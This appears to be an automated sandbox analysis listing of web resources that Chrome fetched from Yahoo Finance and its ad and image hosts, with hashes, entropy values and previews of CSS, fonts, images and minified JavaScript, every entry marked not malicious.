                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:011F8D29C4816CEC96769152E367FB83
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1608E05E3FD164004A8880B7FBB45B88626BC10F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DA3E637CCD47195E27F50560C33DCBF27F7FC56407227DE4A7F9429D3B490035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:51A402895D1A7BAA2F5420B9582971931666B65FFB903EBAFE189FAB8CBB1D0C7F1E910CCC714055827A78CA52E14BC97F88223DBCCF0F302BD8226A10E8663B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectionHeader.B9ETuNQk.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.mb-0.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-0)}.mb-2.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-2)}.mb-4.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-4)}.mb-6.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-6)}header.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-3xl);--_font-weight:var(--font-bold);margin-bottom:var(--mb);display:flex;align-items:center;justify-content:space-between;font-weight:var(--font-bold);text-decoration:none}header.yf-13lpgjv .header.yf-13lpgjv{font-size:var(--_font-size);font-weight:var(--_font-weight);line-height:1.25}header.yf-13lpgjv .header.ellipsis.yf-13lpgjv{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}header.small.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-xl)}header.x-small.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-l);--_font-weight:var(--font-bold)}header.medium.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-3xl)}header.desc.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-2)}:not(header).desc.yf-13lpgjv.yf-13lpgjv{margin-bottom:var(--mb)}.clickToViewMore.yf-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), CFF, length 48340, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995961948732514
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:sz46HkuLMNLrB62h1Wozok6WM6MWNFegbBJd2RQul8JwkH5QmfwKXPCkkAhHCUI3:A4EkuL0n1hck6VpW9b4RnlEwoQE9UA9U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:775987BE3C804E87E03973D02B25D0E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D4DB949358DF33AB0EDAD20375DAC018586FF1BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:328A01FA8476EBAE49A4D78CCF488E652C084CF8F0E30439335ECCC3360F9A25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:81A6DEEEE8B322AA616172A2BCD9E78B5C0D9AC06B0696D390486C1CCA9C3F67F9968315E5B4381856E2B1FEF5C26490E64ED029F7D7CD1E903A5CE35675137C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/finance/gtfont/GT-America-Bold.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:wOF2OTTO..........WH...............................j.j...2..h.`....6.$..(....u. [nV...c.N6.T..nC....^....IH.my..7'):`..D...'2........%._..m...8...i...SJ!............"..;6.s.u.k.E.V.G......x.p.@J.&b..E.YI.G.E..jjQ.cs.dh.X.t.O..w..*..p*..E.Tr....q....[...<TR%UR%...Q..k).....K.k.).if...f..Wr..f..zRl.:..J...;..T,.cM&.4.63.*...h)/../ts..&%..Xh.L.l.}...3.......@G3.pt..D...@ZO......(.u..S_?%.yOV.7..h\M1A...O}..k6.>..b.C.T.U..b3..h....C.6TS[U..g.a...L....hHW......S./n....JD..N.?....=.-.K..c.0@0..1z(.UC..#.f.....E>.o .....^`..%.0]...Hk*.2.).>FF..S...G/..L....ECu..i|d..[....e..+..V.m.....A...+.....N<..YWF....;.B.........[>.u..[f.....oO.....$.1. ...2A..|...?....O.@......@.f.D./..!..K.H.:zV>.O. ..............Q..V!.5...,H....?].9.=v.}U}....:b.h..3"".!.3">b.....1b....D.8.ngu...TbGN.S...S.&...H..}...a..@S_g m..T..J.,.....O...j.u...]....S.F.....N4c..C."...0$...1.4....N.....A.Lur.\....+W...z...W..B....0-....k.<&Mr...>........P.C...#.$.Mcp.p Y.U.$.d;.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):237
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.578085753393818
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:5XA9QzLtLgVxXAbuGMLoa7ARQXA9QzLsJLn:RA2J0VJAbm7AR2A2M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FDF1FC8FE6BC6D08523F7958B8EDF2B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:64BFDD0AF4AC4C7B85D70D469D6BA14D931E15F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1BA4AEFDEE0BB016C7BD948333B442DE969C615B101F54686DE08ADAD125F4FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F630F5614C5E7F47C020D5E24F0883E4C89CFF47ADB7BD67D8378F36A7B75075FB08358D9D97CF1936FAE293C3F07B2B315D72801A2687DF48A888EC857EF138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.shopping-product:hover .shopping-caption-container{width:155px!important}.shopping-product:hover .shopping-caption{opacity:1!important}@media (max-width:1190px){.shopping-product:hover .shopping-caption-container{width:125px!important}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (449)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):450
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.822545201162015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:lLRACRqLRvUBEcJ6UUC87PNcjZWUWPLXOURKAAmdss38:RRACuMGUkzrPqURKAvBM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2F760732BFF133CD183A2635B8AB4437
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:18688592297B9F2ADB7E1F54A85FE79CBE2F9AD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:46EE510D33C36B2128FEF93EA79CF7E3F61E854F6AF939B1BFC7EFBD3D303A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A78626CBAA27844A9A79C3D5B4A43ADDB17F2E216EC647D4B2A3EAE63121ACA8FB177EE6BD1D7F3F5A3AF75517C46BEE1681D5D782E2607981BD11E7A4BC4406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/loadIndustry.Bf7GWgL8.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.bottomContent.yf-1pqqqgy{padding-top:var(--space-4)}.tooltip-value.yf-1pqqqgy{font-weight:var(--font-medium)}.title.yf-1pqqqgy{text-align:left;font-weight:var(--font-bold)}.row.yf-1pqqqgy{display:flex;gap:var(--space-2);padding:var(--space-2) 0;justify-content:space-between;line-height:var(--padding-scalar);white-space:nowrap;border-bottom:1px dashed var(--separator)}.row.yf-1pqqqgy:last-of-type{border-bottom:none;padding-bottom:var(--space-1)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):436098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.389978060744525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:erUNcKn8UMDpgA1TKgM7qezoJtf1n1u86ui2GNvNyp71t6RG/aHIrqGb/b3d44ha:erTnA+NCeF0pRq+V8NTLE0dts
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:17C0767E00620A91C61A5E1C266AEF99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D9C8236B06787B9CE5914ECE2A2A48B46A855104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:80A01FE9EF3A0CB424C64D5CD7F3DEEF820FDC6F2D8AE82EE3D2A0D835D7D1F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:330E4AED21BA50428D81C3D889606738CFAE50927F5B521E34F4EAB6547C105B76CA9E595502615C0F2A4F77B2DAF1429E0A038F145EB2E27F5088DE0C38AC3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.assertive=window.assertive||{};window.assertive.floorPriceVersion='11.9.0_30Mon_14';window.assertive.x771977720=(function(){var a=(function(){var a=[["(?<!motorola )Edge[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgiOS[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgA[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["Edg[ /](\\d+[\\.\\d]+)","Microsoft Edge"],[".*Servo.*Firefox(?:/(\\d+[\\.\\d]+))?","Firefox"],["(?!.*Opera[ /])Firefox(?:[ /](\\d+[\\.\\d]+))?","Firefox"],["(?:BonEcho|GranParadiso|Lorentz|Minefield|Namoroka|Shiretoko)[ /](\\d+[\\.\\d]+)","Firefox"],["CrMo(?:/(\\d+[\\.\\d]+))?","Chrome Mobile"],["Chrome(?:/(\\d+[\\.\\d]+))? Mobile","Chrome Mobile"],["Chrome(?!book)(?:/(\\d+[\\.\\d]+))?","Chrome"],["(?:(?:iPod|iPad|iPhone).+Version|MobileSafari)/(\\d+[\\.\\d]+)","Mobile Safari"],["(?:Version/(\\d+\\.[\\.\\d]+) .*)?Mobile.*Safari/","Mobile Safari"],["(?:iPod|(?<!Apple TV; U; CPU )iPhone|iPad)","Mobile Safari"],["Version/(\\d+\\.[\\.\\d]+) .*Safari/|(?:Safari|Safari(?:%20)?%E6%B5%8F%E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1615), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.020901609734713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:g5Ww5dw4MwlZEa09wmSitQjw4EHG9cBKtVns8RHtm:W5aUl/06mukja7Htm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:12732500BC8E47693F0D777BBE88001C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:97865CCE1C0CD35BAC8AC4B42DC9C6C394DA4809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A03F9A37E34771C42CF7930B2F466EA2077D149F6DBA0E81982E7715A87DD8EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9ED4368E2415EDEFA87BB461BE701E268F93C076852660B2F3B2E661C25D66CDDDA0DBC236410361935365DD954FE1DDF07541CB44557DE25E85FB73BC2FE2BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-content")[0],s=a&&a.getElementsByTagName("a")[0],n=s&&s.getAttribute("data-uuid"),o=function(t){var e;try{e=JSON.parse(window.localStorage.getItem(t))||{}}catch(t){}return e}(t);if(n!==o)e.classList.remove("D(n)"),Array.prototype.slice.call(e.getElementsByClassName("featurebar-close-button")).forEach((function(e){e.addEventListener("click",(function(){!function(t,e){try{window.localStorage.setItem(t,JSON.stringify(e))}catch(t){}}(t,n)}))}))}if(e.classList&&e.classList.contains&&e.classList.contains("auto-play")){var r=window.getComputedStyle(e).height,l=Array.prototype.slice.call(e.getElementsByClassName("featurebar-content")),i=0,c=(i+1)%l.length;function u(){setTimeout((function(){l[i].style.transitionDuration=".8s",l[i].style.transform="
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9531)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.169357646376289
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:m2MR9Jdtd5lyICXts9epa2nkPwwyX8kSPN1esi0vDR:m2MjJdtd5lyICds9eppkL28kS7esXvl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:595F970DA8F693399FFEA3F09D398A6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7B74CE81369A1377A66CC6B814D480CD6D2698B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A93F3D15A8023E04EBC51665C10F5FA3190F70D46590EC3FCEBD16A59E1B5EF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3C2D8CCB127B6130FD61F928466586DA52218DDDA97059D7820406FCD680D78BEC569D83CC0A3F106CF536028B0FC862C0C5E27AFC355A460AD864EE175B891C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-18445eb6.45117ece8d6a81af3d36.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-18445eb6.45117ece8d6a81af3d36.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[3456],{9474:(e,r,s)=>{var o=s(4603);var t,a;t="undefined"!=typeof window?window:s.g,(a=void 0!==o.mE?o.mE:t.CIQ).Renderer.OHLC.requestNew=function(e,r){for(var s=null,o=r.hlc,t=r.colored,i=r.hollow,n=r.volume,l=r.histogram,d=0;d<e.length;d++){var h=e[d];switch(h){case"bar":case"candle":s=h;break;case"volume":n=!0;break;case"hollow":i=!0;break;case"colored":t=!0;break;case"histogram":l=!0,s="candle";break;case"hlc":o=!0,s="bar";break;default:return null}}return null===s?null:new a.Renderer.OHLC({params:a.extend(r,{type:s,hlc:o,colored:t,hollow:i,volume:n,histogram:l})})},a.Renderer.OHLC.getChartParts=function(e,r){var s=16;return[{type:"histogram",drawType:"histogram",style:"stx_histogram_up",condition:8,fill:"fill_color_up",border:"border_color_up",useColorInMap:!0,useBorderStyleProp:!0},{type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.954680065518665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Hq+qaM0upYGmTlYATET9D847/kIS6rnEPRmM2y:KnazqYGElYXDyiEPRmM2y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:782934336D7AA6B4A31BA75F9912CB04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:34D3272D57051021877572D315C886034107DF3B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9D43256AE5693F624110AD866C052C8ACD3816EF2A028EF891CDCB4A4F024D8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:11838B8466F692E120F48A355FAC4B3EAC0C2749AC036B0765417E557318292A3C269BB428F44E1279D141736F2C628B392757F46082078647A511D5E68A4243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://images.taboola.com/taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1200%2Cx_0%2Cy_11/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/9cc49da8e6bbb68a4a886a5bc8ac7872.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF."..WEBPVP8X........S.....VP8 .!..p....*T...>.B.I......j....en.....b.%..>i..I...?9.._...|.....k.....%.>.........v..../ .*...W...^..;...Ol.;./.?........./................i>........o.......~x.F.E.[.......w...O.oi..Cm......t...`Q=..MA^.`.M.(..-...-.g....f.1.......h`.n..wj..d...|C.....dxU ....N.t.|061.Q4.D....o..I...z.aZ.WVH9z.@!}.9j.........[.C...j..c..E..?....6.:.Yw7..<.......yDW.y.V.....[.Vj~.)....EujMy....c..`.*W........-...6.1.]|.*.m.i.u.......H.E...E........<..h.1......[C0...M.......dQFlOr.dH......F.j.y1..V..y0..:D.=..nN+G....>COk....%......../a6..zU7.D.L,..$..Q..]W..V@......`BZ...}.X....1.k..*M.%t..=.Gb.n_.S?.........=...=...8..F!..?..h.Bb...e.;.H.a..%o..c.7....S.,.E......7.@.....0S@......`.....u.m^N.......LG.|..&6..N..{.%4...An..O.....u..1..u.F.).m..7...iK.t..VD0.29.c.F......Vs...*.s.}..y.;......~(P.....f.+....D..-sf.@1.].....].H....k.0.gO..2...R.2= Q. G.../.4J...E.wn=.tok.#m......./.......T.o....t0.....,j....).....+.N.M..^....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3207)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3887507475952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:o/EK1sFEj8iKmKDBrtwi4+DyrMPb9CV50OSek7NFmyMlUH:aDaIWtwEb9CVi5ekzmTg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F125F59422E972C7B11E11579052F9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A18B1082B795476F755A014BBC4C8AEC77B94A22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:285C8C7D873D4BA99A2E8A55FC32E9CA85E21840DC8801EEB98C745236D90EA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FFE0694F4C620A82FC551D64FC900632A6B4DE064653826A8F79BD03031A455534A2FC350A852BFC39B349BCC5823338EFC6D573C819359B510C6C2DCED26CD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Link.vSNQugO0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as C,A as k,e as D,b as E,d as G,f as P,j as W,i as U,B as M,L as u,k as Y,l as v,G as F,_ as N,W as H,c as J,u as K,g as O,a as Q,$ as R}from"./scheduler.Dsuh-FKt.js";import{S as T,i as V,t as m,g as q,a as g,e as L,c as X,b as Z,m as p,d as w}from"./index.CvwOawEI.js";import{g as x}from"./spread.CgU5AtxT.js";import{I as $}from"./Icon.C8w5V9EK.js";import{g as y}from"./i13nUtil.8E8_gCdn.js";function A(n){let e;const a=n[12].default,l=J(a,n,n[11],null);return{c(){l&&l.c()},l(s){l&&l.l(s)},m(s,r){l&&l.m(s,r),e=!0},p(s,r){l&&l.p&&(!e||r&2048)&&K(l,a,s,s[11],e?Q(a,s[11],r,null):O(s[11]),null)},i(s){e||(m(l,s),e=!0)},o(s){g(l,s),e=!1},d(s){l&&l.d(s)}}}function I(n){let e,a;return e=new $({props:{size:n[6]||n[5],icon:n[4],type:"inherit"}}),{c(){X(e.$$.fragment)},l(l){Z(e.$$.fragment,l)},m(l,s){p(e,l,s),a=!0},p(l,s){const r={};s&96&&(r.size=l[6]||l[5]),s&16&&(r.icon=l[4]),e.$set(r)},i(l){a||(m(e.$$.fragment,l),a=!0)},o(l){g(e.$$.fragment,l),a=!1},d(l){w(e,l)}}}function ee(n){let e,a,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (457)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.8806961233017665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:a1PV6fTJL3lSIss7VU0feFw1PDKTKLA4ev:a1iJxSIDV1feu1sK84w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4B110FF4168F6551B3EF74DF58EF047D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5668BC75EACEFE35E50928DAFD3F4D96A08E4714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1E52AD2B125B6F05F5ED5037BD44186F4B1C2D5FFBAF08E436A3FC1597B214F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:797154B1BA3A9C8DFC21629727E91B234E36140056DCD710DB0A10FEBED5919006E68775FB75DBEB7B34581B69D5D9B04323EFFF606A33336BD96BB7658512C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/star.BeZIjP36.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m22 9.24-7.19-.62L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21 12 17.27 18.18 21l-1.63-7.03zM12 15.4l-3.76 2.27 1-4.28-3.32-2.88 4.38-.38L12 6.1l1.71 4.04 4.38.38-3.32 2.88 1 4.28z"/></svg>',l='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 17.27 18.18 21l-1.64-7.03L22 9.24l-7.19-.61L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21z"/></svg>';export{s as S,l as a};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16463)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5029479546237825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:INWOGVizidhosaUlkogyjyOtLIlFi3anVJMh2iVDaA1wyWkM:IoOGczidrrkogUyOtUlFisVJcN1vWkM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:96558A188F7E6806C5495BEA48150E1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:670FFF800819C701639B95BACD5D46B88232E3DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FA0BDE4F9F0795649792EC9E3575F754F062EF800EBBB60874EA8C28C0433FAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1EDDBB25443561F46B29D45A5F0554C4CB888C3AD0012FC0647080F8569B20F55A548CA53F22A362B84984D160F9D8234DBB898E0C3D70B48C7B0A81484149F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["./ErrorMsg.Cn69Klh6.js","./scheduler.Dsuh-FKt.js","./index.CvwOawEI.js","./error_outline.CkdKfkE_.js","./Icon.C8w5V9EK.js","./spread.CgU5AtxT.js","../assets/Icon.DgFg0-NP.css","./commonUtil.BWwawKjd.js","./stores.BCwnb1-k.js","./43.BgWy8GOF.js","./control.CYgJF_JY.js","../assets/ErrorMsg.CmzKsgiD.css","./ChatSupport.IUi6_euu.js","./globals.D0QH3NT1.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{_ as K}from"./preload-helper.D6kgxu3v.js";import{d as L,c as N,aR as X,h as J,aS as ie,aT as Q,aU as G,s as _,aV as oe,Z as le,an as ue,F as W,aW as ce,aX as me,a7 as de}from"./commonUtil.BWwawKjd.js";import{f as M,l as O,b as ae}from"./logUtil.CCV3qKPL.js";import{l as fe,b as pe,c as ge,a as Z}from"./headerUtil.DzYOGaFq.js";import{w as he,x as be,r as x}from"./plusUtil.Bpir1PME.js";import{l as we}from"./loadPortfolios.CP0EWCgJ.js";import{d as Se}from"./index.rV6zwFgL.js";import{a as Pe}from"./ads.DhuB_mth.js";async function ye(e,{silent:t=!1}){const[r,[i]
